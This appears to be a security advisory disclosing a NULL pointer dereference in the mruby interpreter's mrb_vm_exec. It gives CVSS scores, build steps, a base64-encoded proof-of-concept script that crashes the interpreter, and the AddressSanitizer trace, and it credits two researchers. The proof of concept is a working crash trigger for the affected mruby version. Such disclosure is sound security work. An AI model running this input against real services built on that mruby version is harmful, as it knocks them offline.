Octaviogalland68E09EC1-6CC7-48B8-981D-30F478C70276NULL Pointer Dereference
5.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
7.1 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:N/I:N/A:C
0.001 Low
EPSS
Percentile
22.0%
Description
There is a NULL Pointer Dereference in mrb_vm_exec (vm.c:1929). This bug has been found on mruby lastest commit (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake.
2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):
$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
#0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
#1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
#2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
#3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
#4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
#5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
#6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING
Impact
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related
5.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
7.1 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:N/I:N/A:C
0.001 Low
EPSS
Percentile
22.0%